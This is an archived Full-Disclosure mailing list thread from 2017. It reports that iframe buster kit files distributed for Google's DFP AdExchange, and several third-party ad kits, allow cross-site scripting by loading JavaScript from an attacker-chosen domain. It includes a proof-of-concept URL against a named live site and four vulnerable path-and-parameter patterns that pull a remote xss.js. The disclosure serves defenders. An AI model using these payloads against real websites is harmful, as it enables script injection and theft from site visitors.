lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Tue, 19 Dec 2017 17:09:26 +0100
From: Zmx <larouanne@...il.com>
To: fulldisclosure@...lists.org
Subject: Re: [FD] Google supported XSS kit aka AdExchange iframe buster kit

Some more details:

1) The google article seems to link the problematic kit only in non-english
local (check the french version or spanish one)
2) In order for predicta to work, you should host your javascript on a
specific path: /mrm-ad/commons.js


2017-12-19 15:24 GMT+01:00 Zmx <larouanne@...il.com>:

> Hi list,
>
> The DFP AdExchange service of Google (the service who provide ads) is
> distributing an "Iframe Buster Kit" in order to allow iframe ads to expand
> outside of the iFrame.
>
> This needs some bypass of the restriction applied to iframe, so Google
> provide a kit to install on your website:
> - Help Document: https://support.google.com/dfp_premium/answer/1074250
> - Kit: https://storage.googleapis.com/support-kms-prod/
> DB3CE51C3A5F783ED8198CDA753995FEB913
>
> The kit contains several html and js files to be hosted on your domains.
>
> Some of those files (still provide by Google, remember) contains very
> visible XSS code:
> One of them is "predicta" that simply allow you to pass the domain of from
> where to load the javascript.
>
>
> Quick proof of concept:
> - https://www.jobisjob.ch/predicta/predicta_bf.html?dm=bgtian.life
>
> As expandable ads allow website to gain more ads revenue, those kits is
> present in a lot of website.
>
> Other "iframe buster kit" exist that are not provided by Google, and some
> of them are also vulnerable.
>
> From my list I have:
> - /admotion/afa-iframe.htm?iq=https://bgtian.life/xss.js
> - /ipinyou/py_buster.html?pybust=https://bgtian.life/xss.js
> - /rockabox/rockabox_buster.html?rbbust=https://bgtian.life/xss.js (look
> like different version exist however)
> - /undertone/iframe-buster.html?ajurl=https://bgtian.life/xss.js
>
>
> Some source:
> - Code of predicta_bf.html provide by Google in the kit:
> https://pastebin.com/BggXDHNA
> - Code of https://bgtian.life/xss.js : https://pastebin.com/8GZTaJ4b
> - Code of rockabox: https://pastebin.com/xqhs3zyz
>
> Tr4L
>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ